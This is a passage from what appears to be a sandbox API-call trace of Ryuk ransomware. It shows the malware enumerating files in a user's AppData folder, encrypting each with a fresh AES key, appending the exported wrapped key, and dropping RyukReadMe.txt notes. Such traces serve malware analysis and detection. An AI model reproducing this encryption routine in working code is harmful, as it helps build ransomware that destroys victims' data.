nNumberOfBytesToRead=0xc7c1, lpNumberOfBytesRead=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac830*=0xc7c1, lpOverlapped=0x0) returned 1 [0148.664] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4250) returned 1 [0148.664] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac828*=0xc7c1, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ac828*=0xc7d0) returned 1 [0148.665] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0148.665] WriteFile (in: hFile=0x18c, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0xc7d0, lpNumberOfBytesWritten=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac830*=0xc7d0, lpOverlapped=0x0) returned 1 [0148.665] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac870*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac870*, lpNumberOfBytesWritten=0x29ac834*=0x6, lpOverlapped=0x0) returned 1 [0148.665] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ac840 | out: pbData=0x0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0148.665] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ac8c0, pdwDataLen=0x29ac840 | out: pbData=0x29ac8c0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0148.665] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac8c0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac8c0*, lpNumberOfBytesWritten=0x29ac834*=0x10c, lpOverlapped=0x0) returned 1 [0148.665] CloseHandle (hObject=0x18c) returned 1 [0148.681] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0148.685] CryptDestroyKey (hKey=0x3b8690) returned 1 [0148.686] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0148.686] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0148.686] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0148.686] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\E7FVX.flv", dwFileAttributes=0x80) returned 1 [0148.686] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\E7FVX.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\e7fvx.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0148.686] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac838 | out: lpFileSize=0x29ac838*=72469) returned 1 [0148.686] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac848 | out: lpFileSize=0x29ac848*=72469) returned 1 [0148.687] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x119f3, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0148.687] ReadFile (in: hFile=0x18c, lpBuffer=0x29ac898, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ac858, lpOverlapped=0x0 | out: lpBuffer=0x29ac898*, lpNumberOfBytesRead=0x29ac858*=0x19, lpOverlapped=0x0) returned 1 [0148.687] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0148.687] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ac820 | out: phKey=0x29ac820*=0x3b8690) returned 1 [0148.687] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0148.687] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0148.687] ReadFile (in: hFile=0x18c, lpBuffer=0x2760000, nNumberOfBytesToRead=0x11b15, lpNumberOfBytesRead=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac830*=0x11b15, lpOverlapped=0x0) returned 1 [0148.689] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4250) returned 1 [0148.689] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac828*=0x11b15, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ac828*=0x11b20) returned 1 [0148.689] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0148.689] WriteFile (in: hFile=0x18c, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x11b20, lpNumberOfBytesWritten=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac830*=0x11b20, lpOverlapped=0x0) returned 1 [0148.689] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac870*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac870*, lpNumberOfBytesWritten=0x29ac834*=0x6, lpOverlapped=0x0) returned 1 [0148.689] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ac840 | out: pbData=0x0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0148.689] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ac8c0, pdwDataLen=0x29ac840 | out: pbData=0x29ac8c0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0148.689] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac8c0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac8c0*, lpNumberOfBytesWritten=0x29ac834*=0x10c, lpOverlapped=0x0) returned 1 [0148.690] CloseHandle (hObject=0x18c) returned 1 [0148.705] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0148.709] CryptDestroyKey (hKey=0x3b8690) returned 1 [0148.709] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0148.709] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0148.709] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0148.709] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\EY7KeFOG-ySCD4g.avi", dwFileAttributes=0x80) returned 1 [0148.710] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\EY7KeFOG-ySCD4g.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\ey7kefog-yscd4g.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0148.710] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac838 | out: lpFileSize=0x29ac838*=36145) returned 1 [0148.710] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac848 | out: lpFileSize=0x29ac848*=36145) returned 1 [0148.710] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x8c0f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0148.710] ReadFile (in: hFile=0x18c, lpBuffer=0x29ac898, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ac858, lpOverlapped=0x0 | out: lpBuffer=0x29ac898*, lpNumberOfBytesRead=0x29ac858*=0x19, lpOverlapped=0x0) returned 1 [0148.711] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0148.711] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ac820 | out: phKey=0x29ac820*=0x3b8690) returned 1 [0148.711] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0148.711] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0148.711] ReadFile (in: hFile=0x18c, lpBuffer=0x2760000, nNumberOfBytesToRead=0x8d31, lpNumberOfBytesRead=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac830*=0x8d31, lpOverlapped=0x0) returned 1 [0148.711] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4250) returned 1 [0148.711] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac828*=0x8d31, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ac828*=0x8d40) returned 1 [0148.712] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0148.712] WriteFile (in: hFile=0x18c, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x8d40, lpNumberOfBytesWritten=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac830*=0x8d40, lpOverlapped=0x0) returned 1 [0148.712] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac870*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac870*, lpNumberOfBytesWritten=0x29ac834*=0x6, lpOverlapped=0x0) returned 1 [0148.712] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ac840 | out: pbData=0x0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0148.712] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ac8c0, pdwDataLen=0x29ac840 | out: pbData=0x29ac8c0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0148.712] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac8c0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac8c0*, lpNumberOfBytesWritten=0x29ac834*=0x10c, lpOverlapped=0x0) returned 1 [0148.712] CloseHandle (hObject=0x18c) returned 1 [0148.732] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0148.736] CryptDestroyKey (hKey=0x3b8690) returned 1 [0148.736] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0148.737] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0148.737] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0148.737] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\FWHyK.avi", dwFileAttributes=0x80) returned 1 [0148.737] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\FWHyK.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\fwhyk.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0148.737] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac838 | out: lpFileSize=0x29ac838*=95561) returned 1 [0148.737] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac848 | out: lpFileSize=0x29ac848*=95561) returned 1 [0148.737] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x17427, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0148.737] ReadFile (in: hFile=0x18c, lpBuffer=0x29ac898, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ac858, lpOverlapped=0x0 | out: lpBuffer=0x29ac898*, lpNumberOfBytesRead=0x29ac858*=0x19, lpOverlapped=0x0) returned 1 [0148.738] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0148.738] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ac820 | out: phKey=0x29ac820*=0x3b8690) returned 1 [0148.738] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0148.738] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0148.739] ReadFile (in: hFile=0x18c, lpBuffer=0x2760000, nNumberOfBytesToRead=0x17549, lpNumberOfBytesRead=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac830*=0x17549, lpOverlapped=0x0) returned 1 [0148.740] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4250) returned 1 [0148.740] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac828*=0x17549, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ac828*=0x17550) returned 1 [0148.740] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0148.741] WriteFile (in: hFile=0x18c, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x17550, lpNumberOfBytesWritten=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac830*=0x17550, lpOverlapped=0x0) returned 1 [0148.741] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac870*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac870*, lpNumberOfBytesWritten=0x29ac834*=0x6, lpOverlapped=0x0) returned 1 [0148.741] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ac840 | out: pbData=0x0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0148.741] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ac8c0, pdwDataLen=0x29ac840 | out: pbData=0x29ac8c0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0148.741] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac8c0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac8c0*, lpNumberOfBytesWritten=0x29ac834*=0x10c, lpOverlapped=0x0) returned 1 [0148.741] CloseHandle (hObject=0x18c) returned 1 [0148.760] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0148.766] CryptDestroyKey (hKey=0x3b8690) returned 1 [0148.766] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0148.766] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0148.766] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0148.766] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\GogIJCxVgCUgBi89xsg.wav", dwFileAttributes=0x80) returned 1 [0148.766] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\GogIJCxVgCUgBi89xsg.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\gogijcxvgcugbi89xsg.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0148.767] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac838 | out: lpFileSize=0x29ac838*=5609) returned 1 [0148.767] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac848 | out: lpFileSize=0x29ac848*=5609) returned 1 [0148.767] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x14c7, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0148.767] ReadFile (in: hFile=0x18c, lpBuffer=0x29ac898, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ac858, lpOverlapped=0x0 | out: lpBuffer=0x29ac898*, lpNumberOfBytesRead=0x29ac858*=0x19, lpOverlapped=0x0) returned 1 [0148.768] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0148.768] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ac820 | out: phKey=0x29ac820*=0x3b8690) returned 1 [0148.768] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0148.768] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0148.768] ReadFile (in: hFile=0x18c, lpBuffer=0x2760000, nNumberOfBytesToRead=0x15e9, lpNumberOfBytesRead=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac830*=0x15e9, lpOverlapped=0x0) returned 1 [0148.768] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4250) returned 1 [0148.768] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac828*=0x15e9, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ac828*=0x15f0) returned 1 [0148.768] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0148.768] WriteFile (in: hFile=0x18c, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x15f0, lpNumberOfBytesWritten=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac830*=0x15f0, lpOverlapped=0x0) returned 1 [0148.769] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac870*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac870*, lpNumberOfBytesWritten=0x29ac834*=0x6, lpOverlapped=0x0) returned 1 [0148.769] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ac840 | out: pbData=0x0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0148.769] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ac8c0, pdwDataLen=0x29ac840 | out: pbData=0x29ac8c0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0148.769] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac8c0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac8c0*, lpNumberOfBytesWritten=0x29ac834*=0x10c, lpOverlapped=0x0) returned 1 [0148.769] CloseHandle (hObject=0x18c) returned 1 [0148.801] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0148.805] CryptDestroyKey (hKey=0x3b8690) returned 1 [0148.805] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0148.805] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0148.805] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0148.805] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\hhIWqSGhkJt.xlsx", dwFileAttributes=0x80) returned 1 [0148.806] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\hhIWqSGhkJt.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\hhiwqsghkjt.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0148.806] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac838 | out: lpFileSize=0x29ac838*=40696) returned 1 [0148.806] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac848 | out: lpFileSize=0x29ac848*=40696) returned 1 [0148.806] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x9dd6, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0148.806] ReadFile (in: hFile=0x18c, lpBuffer=0x29ac898, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ac858, lpOverlapped=0x0 | out: lpBuffer=0x29ac898*, lpNumberOfBytesRead=0x29ac858*=0x19, lpOverlapped=0x0) returned 1 [0148.806] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0148.806] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ac820 | out: phKey=0x29ac820*=0x3b8690) returned 1 [0148.807] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0148.807] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0148.807] ReadFile (in: hFile=0x18c, lpBuffer=0x2760000, nNumberOfBytesToRead=0x9ef8, lpNumberOfBytesRead=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac830*=0x9ef8, lpOverlapped=0x0) returned 1 [0148.813] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4250) returned 1 [0148.813] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac828*=0x9ef8, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ac828*=0x9f00) returned 1 [0148.814] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0148.814] WriteFile (in: hFile=0x18c, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x9f00, lpNumberOfBytesWritten=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac830*=0x9f00, lpOverlapped=0x0) returned 1 [0148.814] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac870*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac870*, lpNumberOfBytesWritten=0x29ac834*=0x6, lpOverlapped=0x0) returned 1 [0148.814] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ac840 | out: pbData=0x0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0148.814] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ac8c0, pdwDataLen=0x29ac840 | out: pbData=0x29ac8c0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0148.814] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac8c0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac8c0*, lpNumberOfBytesWritten=0x29ac834*=0x10c, lpOverlapped=0x0) returned 1 [0148.814] CloseHandle (hObject=0x18c) returned 1 [0148.830] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0148.834] CryptDestroyKey (hKey=0x3b8690) returned 1 [0148.834] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0148.834] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0148.834] SetLastError (dwErrCode=0x0) [0148.834] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0148.834] GetLastError () returned 0xb7 [0148.835] CloseHandle (hObject=0x18c) returned 1 [0148.835] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2e80 [0148.835] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0148.835] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0148.835] SetLastError (dwErrCode=0x0) [0148.835] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\identities\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0148.835] GetLastError () returned 0x0 [0148.835] WriteFile (in: hFile=0x190, lpBuffer=0x13f108500*, 